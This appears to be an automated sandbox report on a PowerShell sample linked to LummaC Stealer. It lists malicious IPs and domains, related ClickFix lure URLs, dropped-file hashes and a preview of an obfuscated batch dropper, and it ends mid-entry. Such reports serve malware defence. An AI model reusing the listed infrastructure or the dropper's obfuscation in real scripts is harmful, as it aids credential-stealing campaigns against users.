http://www.autoitscript.com/autoit3/X	SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, Puts.com, 0000000D.00000000.1446610400.0000000000255000.00000002.00000001.01000000.0000000A.sdmp, Solution.3.dr, Puts.com.4.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1444500671.000001D580001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	SolPen.exe, 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmp, SolPen.exe, 00000003.00000000.1396087585.0000000000408000.00000002.00000001.01000000.00000008.sdmp, SolPen.exe.0.dr	false		high
https://www.autoitscript.com/autoit3/	SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1444500671.000001D580001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.79.48.182	storageinstance.oss-ap-southeast-1.aliyuncs.com	United States		9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
172.67.128.233	battle-curbe.cyou	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557470
Start date and time:	2024-11-18 09:57:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pennicle.txt.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@25/20@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 45 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .ps1 Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7780 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: pennicle.txt.ps1

Simulations

Behavior and APIs

Time	Type	Description
03:58:07	API Interceptor	43x Sleep call for process: powershell.exe modified
03:58:15	API Interceptor	1x Sleep call for process: SolPen.exe modified
03:58:19	API Interceptor	8x Sleep call for process: Puts.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
47.79.48.182	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.html	Get hash	malicious	Unknown	Browse
47.79.48.182	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/prove-not-robot-check.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
172.67.128.233	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	asset.txt.js	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235	Get hash	malicious	Unknown	Browse	13.107.246.45
	#U051d==.eml	Get hash	malicious	Unknown	Browse	13.107.246.45
	Unlock_Tool_v2.6.5.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	VBoxRT.dll.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	kQ3WxQb6bw.lnk	Get hash	malicious	Unknown	Browse	13.107.246.45
	36yw96m7Ni.lnk	Get hash	malicious	Unknown	Browse	13.107.246.45
	Faturamiz.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
storageinstance.oss-ap-southeast-1.aliyuncs.com	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.html	Get hash	malicious	Unknown	Browse	47.79.48.182
storageinstance.oss-ap-southeast-1.aliyuncs.com	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/prove-not-robot-check.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	47.79.48.182
battle-curbe.cyou	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.233
battle-curbe.cyou	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.2.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	hnl2bose13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235	Get hash	malicious	Unknown	Browse	104.21.94.71
	#U051d==.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	Unlock_Tool_v2.6.5.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	https://listonelove.buzz/zoom/zoommm.html	Get hash	malicious	Unknown	Browse	104.21.90.224
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	2h2xLB9h1L.lnk	Get hash	malicious	Abobus Obfuscator	Browse	172.65.251.78
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.html	Get hash	malicious	Unknown	Browse	47.79.48.182
	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/prove-not-robot-check.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	47.79.48.182
	meerkat.mips.elf	Get hash	malicious	Mirai	Browse	47.76.235.18
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	49.224.236.63
	speedtest-cli.arm5.elf	Get hash	malicious	Mirai	Browse	118.92.187.4
	xX1k6Ghe8s.elf	Get hash	malicious	Mirai	Browse	47.76.171.133
	arm5.elf	Get hash	malicious	Mirai	Browse	118.95.51.127
	bin.arm.elf	Get hash	malicious	Mirai	Browse	121.75.97.174
	drivers-v1.ps1	Get hash	malicious	LummaC	Browse	47.79.48.189
	getsetup3rd.ps1	Get hash	malicious	LummaC	Browse	47.79.48.189

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	hnl2bose13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	47.79.48.182
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	47.79.48.182
	2h2xLB9h1L.lnk	Get hash	malicious	Abobus Obfuscator	Browse	47.79.48.182
	SOA.exe	Get hash	malicious	AgentTesla	Browse	47.79.48.182
	13jhsfbose.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	47.79.48.182
	kQ3WxQb6bw.lnk	Get hash	malicious	Unknown	Browse	47.79.48.182
	36yw96m7Ni.lnk	Get hash	malicious	Unknown	Browse	47.79.48.182
	scut18bo03.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	47.79.48.182
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	47.79.48.182
	bose2scut18.bat	Get hash	malicious	Abobus Obfuscator	Browse	47.79.48.182
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.128.233
	file.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	LPC Scanned Docs-Copyright #U00a9GNP.CPL.dll	Get hash	malicious	AsyncRAT	Browse	172.67.128.233
	file.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	file.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	Adobe Activator.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	file.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	Launcher.exe	Get hash	malicious	LummaC	Browse	172.67.128.233
	file.exe	Get hash	malicious	Unknown	Browse	172.67.128.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\701961\Puts.com	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse
	SolPen.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.html	Get hash	malicious	Unknown	Browse
	grd.ps1	Get hash	malicious	LummaC Stealer	Browse
	AssumedAlready.exe	Get hash	malicious	LummaC	Browse
	yhYrGCKq9s.exe	Get hash	malicious	RedLine	Browse
	nj230708full.pdf.scr.exe	Get hash	malicious	AsyncRAT, AveMaria, StormKitty, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1520
Entropy (8bit):	5.393379034164121
Encrypted:	false
SSDEEP:	24:3RtZoNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0Jr8HJYBlD3C:ZoNn4SU4y4RQmFoUeCamfm9qr9trBLN9
MD5:	2DAF39CE53935A6DABCEEC9551AEB57E
SHA1:	1E7537B41C490497485504BA91EECF1A301329BD
SHA-256:	1C911D8B14E8469EF40AA7067A053D62AAA9FBAF127BEE5FAA09D38748310A4D
SHA-512:	4F6AA0F29BF09304540EAC39F1FFC0EA023E7F2CEBDD339D8CB1AA8FF2A98C491BA688EE6604F86D301C43E37190A8BE751C6D9841E66AE07BF8469355130358
Malicious:	false
Preview:	@...e...........7....................................@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Ma

C:\Users\user\AppData\Local\Temp\701961\Puts.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: SolPen.exe, Detection: malicious, Browse Filename: SolPen.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: grd.ps1, Detection: malicious, Browse Filename: AssumedAlready.exe, Detection: malicious, Browse Filename: yhYrGCKq9s.exe, Detection: malicious, Browse Filename: nj230708full.pdf.scr.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\701961\j

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	517871
Entropy (8bit):	7.999633155090557
Encrypted:	true
SSDEEP:	12288:4xAxUy3Kulezxs7KGqxGTyTLbxpwuptd5FGt69AYTWg:sAxkulezhGqYTyrxpwuptd5EQ9P
MD5:	B4E6782B85BD29593DC52C87C0C00312
SHA1:	784B595BA81BDB9093CA3C3228188ECAC613DEFD
SHA-256:	F11BFA5482BEDA3C3E7C4A86797E8C2BE7D640D7FBA4B469F90962CC0A64D4B3
SHA-512:	D769498C6BB62929584CC74549C1D1ABC77A1B0DFF0468A00742F74A1615354AC0CC2FB2C9237635FFEA53072D793B2C6133359F01C78988924959E734036EEF
Malicious:	false
Preview:	..&;@1.s5..Lp..Jt@......0<........U...hv...k..Z..P...;...1.5.......?.U).5.`..;..z....2.6.u....U...J..v.....%I.d7......fM...du..j{-.z..~~H4..A...}...E.'Z....Z(..E..t...f......1.R...Z5..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.?.'.F...h..............9...v.:.9...v.:kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..p.P..,P..Myn.2..t.W.....c..........9...H.:.9...v.:m.....r.....5...x..2(.U.j...."c.\|#.A......)...i......-....,........G...>...l.:t..V-.._R..W.-.1....Xe.E..G...W..s....ix....(..+....m.....(..%p../.n....4..G]V.z.MX......!.......4..?..#..V....@..Z...(.G..wQ..=.IH.e.d.Z..v..X^.H.J*.0..^N....%.q..Jp.......H.(1.]........~...H.S-.ND..2.y...x.gNM...r....r22.Gb2..

C:\Users\user\AppData\Local\Temp\Battle

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	ASCII text, with very long lines (728), with CRLF line terminators
Category:	dropped
Size (bytes):	11611
Entropy (8bit):	5.1413164768389805
Encrypted:	false
SSDEEP:	192:/EotvOz1fIr2anFrInFZZ2q/rDXylaQMoZ9Ri3mmrO8LanuO8N+EoEWDO9evo2vQ:3VU1fIrBG3/3ylaQpnSmmC8LauO8sEoa
MD5:	B468E489F7478DD1AB553F2A8AC7DD9B
SHA1:	4AC8E9CF88787F01255E349620A55A7BCFC7FC35
SHA-256:	507CDA0B4A35A655C4396515401F7CC68ED71DCEA35139840EE841F3D4FB3B07
SHA-512:	5D926CB49A7B8E3E57F392D64DF2B684AB9602379493EE3976ADBE24EB30A87E2FEA74E2C8E21EDAE7A7DD3483AE9C6AE788DC3889D22DFD7A51E29E632591D5
Malicious:	false
Preview:	Set Former=c..btgZMembership-..ZQwTGs-Gale-..MkFLimiting-Pen-Violations-Spots-Expenditures-Headset-..ioModule-Supervision-Expired-Heroes-Qualities-Belkin-Flexibility-..ZCMVariables-Programmer-..Set Verbal=g..uKBzCheque-Summit-Redeem-..HRConversion-Andorra-Rescue-Wanna-Arrived-..qezSpaces-Knee-Flyer-Viral-Multi-Producers-Socket-Raid-..lkIColleague-Ethnic-Candidate-Assuming-Organisms-Snap-Transcripts-Fantastic-..xQCThriller-Chances-Any-Lcd-Philippines-Replies-Mexican-Efficiently-..wqfDToilet-Liver-..HfComputation-Monster-Peoples-Triangle-Nam-..kbABoards-Lovely-Handy-Protect-..JJYCBrass-Mercury-Enjoyed-Dozens-Broadband-..Set Dispute=a..jQRsPenny-Dialogue-..mwOrdinance-..mqGeneral-Arnold-Subaru-..IzpZHopes-Welsh-Automobile-..wjlPositioning-Grove-Arbitration-Sp-Radical-Contributors-..Set Smell= ..ZtrvSimpsons-Importance-Spokesman-Silk-Schedule-Hung-..TpdElectronic-Roman-..xMVJConnector-Charms-..FtFrog-Reach-Manuals-Attitudes-M-Clicks-Pty-Court-Singer-..PTGApplication-Strengths-Transmitted-W

C:\Users\user\AppData\Local\Temp\Battle.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (728), with CRLF line terminators
Category:	dropped
Size (bytes):	11611
Entropy (8bit):	5.1413164768389805
Encrypted:	false
SSDEEP:	192:/EotvOz1fIr2anFrInFZZ2q/rDXylaQMoZ9Ri3mmrO8LanuO8N+EoEWDO9evo2vQ:3VU1fIrBG3/3ylaQpnSmmC8LauO8sEoa
MD5:	B468E489F7478DD1AB553F2A8AC7DD9B
SHA1:	4AC8E9CF88787F01255E349620A55A7BCFC7FC35
SHA-256:	507CDA0B4A35A655C4396515401F7CC68ED71DCEA35139840EE841F3D4FB3B07
SHA-512:	5D926CB49A7B8E3E57F392D64DF2B684AB9602379493EE3976ADBE24EB30A87E2FEA74E2C8E21EDAE7A7DD3483AE9C6AE788DC3889D22DFD7A51E29E632591D5
Malicious:	false
Preview:	Set Former=c..btgZMembership-..ZQwTGs-Gale-..MkFLimiting-Pen-Violations-Spots-Expenditures-Headset-..ioModule-Supervision-Expired-Heroes-Qualities-Belkin-Flexibility-..ZCMVariables-Programmer-..Set Verbal=g..uKBzCheque-Summit-Redeem-..HRConversion-Andorra-Rescue-Wanna-Arrived-..qezSpaces-Knee-Flyer-Viral-Multi-Producers-Socket-Raid-..lkIColleague-Ethnic-Candidate-Assuming-Organisms-Snap-Transcripts-Fantastic-..xQCThriller-Chances-Any-Lcd-Philippines-Replies-Mexican-Efficiently-..wqfDToilet-Liver-..HfComputation-Monster-Peoples-Triangle-Nam-..kbABoards-Lovely-Handy-Protect-..JJYCBrass-Mercury-Enjoyed-Dozens-Broadband-..Set Dispute=a..jQRsPenny-Dialogue-..mwOrdinance-..mqGeneral-Arnold-Subaru-..IzpZHopes-Welsh-Automobile-..wjlPositioning-Grove-Arbitration-Sp-Radical-Contributors-..Set Smell= ..ZtrvSimpsons-Importance-Spokesman-Silk-Schedule-Hung-..TpdElectronic-Roman-..xMVJConnector-Charms-..FtFrog-Reach-Manuals-Attitudes-M-Clicks-Pty-Court-Singer-..PTGApplication-Strengths-Transmitted-W

C:\Users\user\AppData\Local\Temp\Closely

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997269555598351
Encrypted:	true
SSDEEP:	1536:cxwxOD1l+dSjGNB+AlZDvNdeoLrnjmrn2cUUP5HGClMEkJ:cxHD1tjGNTvBrnajlp3SEC
MD5:	FA2E55CF1A770C71E719D461D4387EB9
SHA1:	CC65F46982D93A1E629CBC1C9AD968940B2BDD74
SHA-256:	E806C729C9E72295A20290418A5D9A3DA99545B71E8DA2FB7567346A19A52D8F
SHA-512:	1FD4AB24F80A4CFBF8343E0F0AF055F03151EFF43FE3B9081650BECBC2A3B276F9FA083B54CA5C9DC306F511E12CC48117E3D462FA22986DFF79C36BF38B9823
Malicious:	false
Preview:	..ts......cz.._Z....~..G...R.p....Y......>fS....{0..o..^.C.t.aH..ge.V...nh .X.Q".B.Y.R1T'.....p...?_].-(...V.Ht..D...6.}.an.F.@]....~\|H...wC.n_Ba.W.j]$X.B..k......5.....eT..EJ.+..2./.<.F.Q..V......q."....;F........y.u..w..[.5Z.Zu.......&O...Cv...Qd..3....WT....'.G$..R._...M......W...&.R.]\|..@\.G.,0...w>.[.......d....sn..?R@&1.(..{.....M...Y.$....l1......R.K..~.a.....M.h'7........K>..&.b.X8L.....0tQ.D...d.<L.:4d2@..8..C.(.6.._.*....n....6..~...s.+...!...........Rt..F....F.y..s......D..w...G.6.M.1Zr.:..3.fd..pk.e.....R.......m.X....`.....ye[.T5x.^..]Y~h..3y..fJ.W...T~......._+....A.(...Ov^.:)...q@.......r.rd...( ..K:....q....PB@....Z<.=...,...!Cc...e.T \|L&......k...X....'D.6P.......=c....&.v..0.k..Dc...%..~.0Z.....R.(..0.....{..e....stS..vI.'.....d..$rP.....y......A..: .J....+y.h.>f.i..n.k.s]....o..m,f+.\|"...vPR....Z.....F.5...kQ.e..#..5.B.9.....&.d...).m...c.C..\|..+=..i_.M.....dW.z............7&$..8.s4D.E.ljP..b.H....Y.56........r

C:\Users\user\AppData\Local\Temp\Inventory

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.998199557715884
Encrypted:	true
SSDEEP:	1536:9dAgd/SI4S7ZZ/GcMi2FLKlLG9ljZfkVwhJaryWhFNaFR7YJBZdg5MC6iGtli:fACLfALW4JCVwhJpkNU35LZ7
MD5:	DC2906AAE8ABF4E2E1541ED078112ADA
SHA1:	9538D56FBD8ACB57F62437F68019AC6055A40E4D
SHA-256:	7CF33FD97326F3CAAC0C005D6C17CAD3BEE8588DE8F92F9731A3846CB1475002
SHA-512:	F977C0380DDEC015A4C0349B8FC0883E8C77236E46D91CEA9BD447BED665FCB6582B3372986735AF85BDA5680FA8F60A8C00C1EC3DDD827C466AEEAABD072606
Malicious:	false
Preview:	.u.N.../q....Gwti.d..Yy.J.....c....m.t...I.5.Gc ..P.....Glh......UF.B.k.W/\../.D.J."Wq..t...O..R....\.....]..!H..C/n....d..CA.a.C.o...<..&n.DD..u.!.X........i[. .....?n..Ce.....^..K ...xI.!.?GE^.t....!.......y.v.;FQ....}..Ux:..Jc~..U})..A.....WW..,g......D.b...>...cb... ..PD..JCZ....R....\.r.)zd..M.....l......@......i,WzY....B-".....2S'!;.'.....L.!u...r.Q.... .2.....q....T.W......eW.%z..{o.!$..../^.)>.3..L...^..W."W7l.W.D..X..t..D.'8.....4.u.2.v......`].p.zq=.a!..).2,.7Gm..3...... ...U...c...\9Nx.I.Z\....+J.R[_s...e..t.......5..(.k..jLBxfO...QMnp.N..{t..Nx........K...h.l>p..:..4w....`Q.....gV.]"..f.Q.&,.W.?F.......C.]_b.b.YS....l.dK..we.....8/.....$.K\|.T.w..a.c\|..#.....dS.E.........._.K..Q.6....k..B...NA....Zt.N..T?.PB.E0.z5)@q..*vb.......@....F.@S...^Za..w;......T1].l^.U.51.Q..e..SoZ..h...<.l...#Fp..P.;.bH..0....w..qNE.......M:..$...]..t...F..a..q.Me...+(..u.#.v..-.;...?..?..&[.=.....qm{iF....R...e.w...6..1..[.@......sM..Q......

C:\Users\user\AppData\Local\Temp\Kingdom

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.998286456517395
Encrypted:	true
SSDEEP:	1536:FKnMLoKw4WpkP2ohtDdIS3aGwJNCBXp4zeOyBy/kf0ygssFYf5XQ5Rl0S6FLbGDw:8MLoKAkLFISKdjIXBz5A5kS6haDBAuhE
MD5:	87DEB0E74BC8FD2AE4AC39FAD86F7544
SHA1:	D465935D4EB28029F61E5DBCF98B85416A51ECD3
SHA-256:	9215EC62BC6473F16955E39B4B36016E80604853A3F3AF2E2C26338673EA3F0B
SHA-512:	A5FE490F74316BE7F8DF51FF7FE01BC9EE97DE0B574C8A0A9550E9761729EE21F8E0F0ACD16B26B7C2FF5CB7D7CFC5040A366886958D94AC645252CF609371A1
Malicious:	false
Preview:	..x...s<.8.D.....!..E.....I#q'..../......K.....>M...;.2..o..A}./."}~....CIU[.~m.....RxB..S......%./...kiE...6...Bj...S...B.gL...B....2"3....z.n@..@X..X...4.Ge8.4.u.S.5..x],fl.?.B.!)g2C....o....k.x.K..G..i.......3...o...cn.......46..2....s...x..-.k..z...`...n.Y\|Ff.C.S.Sn...-._.F(.PSw........5..R.......)t2.. eS.u..L.8y.M.,..t+.]...G4...:.o...>4M...rr`)3..H.@....U].d....1"a..bA..%.t.o).c...`../...Z.K^.......R.+o.].Wn..>L..w...".e.32..)7...[O5...g.:+C{^......O...W......>.S......k...U...5..H...}.A.....0.u.m,.g.g5ByHR...HQ.e .w.P.W...F..5...5@>.....>R}f..+.M.&9.WS.G.EMc.[.m.......P...w...d...!.\..Z.....<6v.......zM.X..{.xR.\|...6qI......!.n\|...nT..]K.....cx.).p.../h....[,F..Mx.d._....eh>Vv.\|....[~.,.c......H\..TFw...[....<....v..P&....+.s.i...];;01u....&.........h.jf.da..1..X._pm.!.ceT.I.C.....D.......N.1.=e.L&RT''.M.9s....%'p..*...h.....Z.c ......Km.6._Nm......E.(..o...F.,c..U....r..R7<.>......c.j%.........I.G..X......@.!...a.jw.B..WqH.s.

C:\Users\user\AppData\Local\Temp\Playing

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997411691237014
Encrypted:	true
SSDEEP:	1536:/fnWeQEMxL9Sx3IPu5BQlKQKZfZ+zb/5KmXgyIuZ2C0S5/YEnn:nnJMGxj5ylKQKmfRKygvusxSJn
MD5:	9847BFC360FDAE334C6F1CA9C50BE501
SHA1:	600323C36F2E0ADF7C555F89E892EB1059A031FB
SHA-256:	E51AD11AB6DD79FEF226FE7EB61E8F749A46B33D1212BF1C5EA76C5E4CC927CB
SHA-512:	1259219261256FA9012A300F7A4667AB4C0E2BC57D56232E4BA83C06B9CAF6500F7D4A3FCF312E1B78A2CB3D1803899DC0C5F3F97116A42C12B3C1CFB14BA0AF
Malicious:	false
Preview:	.<_!....`E.?..f.R.X}.....eEe=.....%~...$F@5.Y.e.1.$..],...]{..P![.RF..Wd.<./p\.+lI.$I[x......$7S8Fo!..t.."`...\|........l.1G/.x...{...B..p\."P...B..4.I..s.......Wv...y.. ..'..;y.n..:>..Od.H. ...kQ....c2....#.d.wv#_...4....dPa......f...:.L...y.q...R.J.y..e....{]...F.$...?M..MB..%...gW..@...o(E...Z...%y...5\b..d......2....tM.......m..9...+...~..L.k_........D.8.\K<...wT..s....]J%FQ.U6l....`.,..2.Y...P....>...'..HFki".(R<D....WLt............Bf.,z.(....8...f..L.GJ....`...H...]Rl.Y.....e.....P.....I...u .j.8._L._u.(XWh(..f..k....ni.h...[.@.d....../...x.j.Q..2.{....L0~...g...s.....h....)...0.EsI(/.&K..#:\E.\|,J<..b.'P.s...lQ.Rc..Hh.)...q.3...v(:......!.khdi#.\|...w.svE...t.LQ..~M..`.Q&F&`Rs.......[f3P.T..7<.<.!....$62;+[...?Qh'.;......z....C.......eM..6.o6...f..f...z..9.....f7B~.u.&.t.:.7.....ic.H.......(....u...fW..h...0..G.3.......g....C1..C.q..&....../U{).n..q..0^v.a.VOj\.)..H(..9...dk....o.9......N.u.-i,..(:Q...+...$G.k\|E}...{.v...

C:\Users\user\AppData\Local\Temp\Reducing

Download File

Process:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
File Type:	data
Category:	dropped
Size (bytes):	71680
Entropy (8bit):	7.997638584474584
Encrypted:	true
SSDEEP:	1536:bHwTrWBRH0i0qjXCsllovjSMrcbglllZTJBm:LRH0i0qDCjLOb8xTJBm
MD5:	3444CAB11B6809CBE675B9F64828A65C
SHA1:	615CF824D3CBD00BE15D1F085C5B3FD6BC0422FF
